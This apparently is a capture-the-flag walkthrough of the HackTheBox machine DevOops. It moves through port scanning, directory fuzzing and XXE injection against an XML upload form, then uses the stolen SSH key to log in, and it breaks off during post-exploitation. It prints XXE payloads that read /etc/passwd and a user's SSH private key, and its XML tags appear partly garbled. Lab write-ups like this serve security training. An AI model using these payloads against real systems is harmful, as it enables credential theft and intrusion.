Subscribe to my newsletter and never miss my upcoming articles
DevOops is a Medium-rated retired machine on HackTheBox, and also appears on the TJ Null list for OSCP prep.
We begin with a basic TCP/ UDP ports scan.
TCP/ UDP Ports Scan and Service Enumeration
nmap -Pn -sT -p- --min-rate 10000
-oN nmap/tcp_ports_scan $IP
nmap --privileged -Pn -sU -p- --min-rate 10000
-oN nmap/udp_ports_scan $IP
No UDP ports are open. Now, we perform service enumeration, version detection, and script scan on the open TCP ports.
nmap -Pn -sT -A -p 22,5000,50627 -oN nmap/tcp_script_scan $IP
Further Discovery and Vulnerability Assessment
With the services and their versions at hand, we can search for any available exploits using searchsploit.
searchsploit openssh 7.2
searchsploit gunicorn
Even upon further googling, we do not see any off-the-shelf exploits for these services.
There is a website running on port 5000. Let’s check for some common directories.
ffuf -u http://$IP:5000/FUZZ -w $COMMON_DIRS -e .php,.txt,.html
-t 500 -ic -rate 1000 -r -c | tee ffuf/common_dirs.txt
ffuf -u http://$IP:5000/FUZZ -w $MEDIUM_DIRS -e .php,.txt,.html
-t 500 -ic -rate 1000 -r -c | tee ffuf/medium_dirs.txt
In 10.10.10.91:5000/upload, we can upload XML files with the elements – Author, Subject, Content
Let’s create a sample abc.xml file as follows and upload it.
<Book>
<Author>FrankAuthor>
<Subject>SciFiSubject>
<Content>DuneContent>
Book>
This direction seems promising. We have a dump of new info –
- the server has a user called
roosa - abc.xml has been uploaded to
/home/roosa/deploy/srcon the server, and can now be accessed at 10.10.10.91:5000/uploads/abc.xml
As expected, abc.xml is available at 10.10.10.91:5000/uploads/abc.xml
As soon as we see XML, the embers of XXE ignite in our hearts. Let’s fan those embers into flames. If you don’t know what XXE injection is, please check out this post – portswigger.net/web-security/xxe.
Let’s create a passwd.xml as follows and upload it.
foo [ xxe SYSTEM "file:///etc/passwd"> ]>
<Book>
<Author>FrankAuthor>
<Subject>SciFiSubject>
<Content>&xxe;Content>
Book>
Bingo! Now, that’s the XXE injection we all know and love.
It’s cropped in the image above, but if we scroll down, we will find an entry for roosa in /etc/passwd –
roosa:x:1002:1002:,,,:/home/roosa:/bin/bash
Now that we know XXE works, I’d highly suggest you to give a sincere shot at getting to the user shell on your own before proceeding further with this write-up.
The fruits of one’s own work are always the sweetest.
Enumeration
Since we are able to read files on the server, let’s be a little ambitious and try to read files from roosa’s home directory. Since the SSH port was open, roosa’s id_rsa private key file seems like a good target. Let’s try reading the following files –
/home/roosa/user.txt/home/roosa/.ssh/id_rsa
We can exfiltrate both of them with user.xml and id_rsa.xml as shown below. All you need to do is change /etc/passwd to the respective user.txt and id_rsa paths.
foo [ xxe SYSTEM "file:///home/roosa/user.txt"> ]>
<Book>
<Author>FrankAuthor>
<Subject>SciFiSubject>
<Content>&xxe;Content>
Book>
foo [ xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>
<Book>
<Author>FrankAuthor>
<Subject>SciFiSubject>
<Content>&xxe;Content>
Book>
Naaice! We got roosa’s ssh private key. Let’s copy it into a file on our local machine – roosa_id_rsa
Exploitation
chmod 600 roosa_id_rsa
ssh -i roosa_id_rsa roosa@$ip
Enumeration
Let’s start a HTTP server on our local machine to host useful binaries & scripts like linpeas.sh which we will download and run on the DevOops server.
python3 -m http.server 1337 --directory=/home/bob/Code/HTB/bins
roosa@gitter:/tmp$ cd /tmp;
roosa@gi